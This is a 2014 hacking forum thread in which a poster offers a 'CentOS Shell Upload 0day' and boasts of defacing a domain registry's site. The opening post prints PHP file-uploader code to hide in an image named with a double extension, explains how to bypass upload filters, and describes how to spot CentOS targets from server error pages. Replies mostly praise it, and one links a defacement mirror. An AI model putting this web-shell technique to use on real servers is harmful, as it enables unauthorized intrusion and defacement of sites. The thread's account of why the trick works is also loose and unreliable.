Hello There, Guest! Login Register
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.

CentOS Shell Upload 0day

  • 3 Vote(s) - 5 Average

04-10-2014, 11:23 PM #1
1337 Offline Don't PM me for help, post it on forum ! *******
Posts:525 Threads:106 Joined:Jun 2012 Reputation: 21
Mood: Hacker
[Image: e1eqs1.jpg]
Assalamu Alaikum, HellO and Hi Everyone !
Few months ago, you might have seen that I had defaced NIC.me (.ME Official Domain Registry)
I was just checking for some bugs and I found an image upload option.
I tried temper data but it failed.
I then decided to add a php upload code into an image that I had on my desktop.
I simply right clicked an image that I had on my desktop and edited it with notepad++. .
At the end of the image code, I added :
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
    else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
And saved that image as 1337.php.jpg

Once you have saved it, your computer will open and show that image as a normal picture. In that case when you upload it on a CentOS server that allows image upload, the system detects the image code and thinks its safe to upload. Once it is uploaded, CentOS server gets confused and takes that image as a normal .php file.
Open that image with the php code that you uploaded, and Wallahh !

How to know if a server is running on CentOS ?
You can see it by HTTP Live Header. If you don't know much about HTTP Live header, try to make the site give you an error like 404 Page not found or 403 Forbidden. On that page, see servers signature. You will see it like Apache/2.2.15 (CentOS) Server at http://www.target.com Port 80

This exploit/vulnerability was discovered by 1337 from TeaM MaDLeeTs

[Image: 28jeale.jpg]
[Image: 2mzgpld.jpg]
[#] CodeName: 1337
[#] Email: [email protected]
[#] Zone-H: http://zone-h.org/archive/special=1/notifier=1337
[#] Facebook: https://www.facebook.com/MaDLeeTs.phtm


[Image: o8rq6s.jpg]

04-10-2014, 11:38 PM #2
3thicaln00b Offline MadLeets Vip ******
Posts:33 Threads:2 Joined:Sep 2012 Reputation: 0
Mood: None
Cool find, good work cheers

04-10-2014, 11:44 PM #3
_Banti Offline Junior Member **
Posts:3 Threads:1 Joined:Apr 2014 Reputation: 0
Mood: None
niceee workk

04-10-2014, 11:47 PM #4
owenks Offline Mad Lover *****
MaDLeeTs LoVer
Posts:41 Threads:1 Joined:Aug 2012 Reputation: 0
Mood: Worried
Nice share, Biggrinsmiley
language of your code is indonesia, who are you?? Biggrinsmiley

Thanks for share. Smiley1

04-10-2014, 11:55 PM #5
H4CK3R $P1D3R Offline Respected *****
Posts:91 Threads:32 Joined:Nov 2013 Reputation: 0
Mood: Hacker
thanx br0

04-10-2014, 11:59 PM #6
Skull Offline Advance Hacker ***
TeaM MaDLeeTs
Posts:132 Threads:13 Joined:Jun 2013 Reputation: 0
Mood: Mad
THANKS dudE Biggrinsmiley

Mirror ( http://dark-h.org/hacker/?s=1&user=PakCyberSkullz )
Pak Leets Biggrinsmiley team MadLeets Biggrinsmiley

04-11-2014, 12:05 AM #7
n4KuLa_ Offline MadLeets Vip ******
Posts:9 Threads:0 Joined:Apr 2014 Reputation: 0
Mood: None
Thanks You So Much brooo :blush:

04-11-2014, 12:07 AM #8
H4x0rl1f3 Offline Commander In Cheif *******
Posts:1,129 Threads:25 Joined:Jun 2012 Reputation: 15
Mood: Stoned
Bullz Finally Out wink

Always Aspect Reward from the Creator and not anyone or anything Created.
For Complaints & Help Contact:- [email protected]
I am the orphan of Gaza & Kashmir. Ruins of Iraq,Syria & Palestine Bombarded of Pakistan,Afghanistan, Mali & Yemen Change of Libya and Egypt Discriminated of Bahrain & Turkey Freedom of Earth's paradise and Al-AQSA. I am the hunger stricken child of Somalia, Ethopia, & rest of Africa I am the suffering of each and every single corner of the world. But Listen!!! Hope is what I am!!

04-11-2014, 12:18 AM #9
maskhush Offline Respected *****
Posts:262 Threads:27 Joined:Oct 2013 Reputation: 0
Mood: None
Thanks brother good work

[Image: dhnw2oE.png]

04-11-2014, 12:20 AM #10
AZ Sn1ff3r (PCP) Offline Mad Lover of Security ******
Posts:461 Threads:46 Joined:Mar 2013 Reputation: 0
Mood: Mad
Gr8t Thankx 4 share Smiley1

Forum Jump:

Users browsing this thread:1 Guest(s)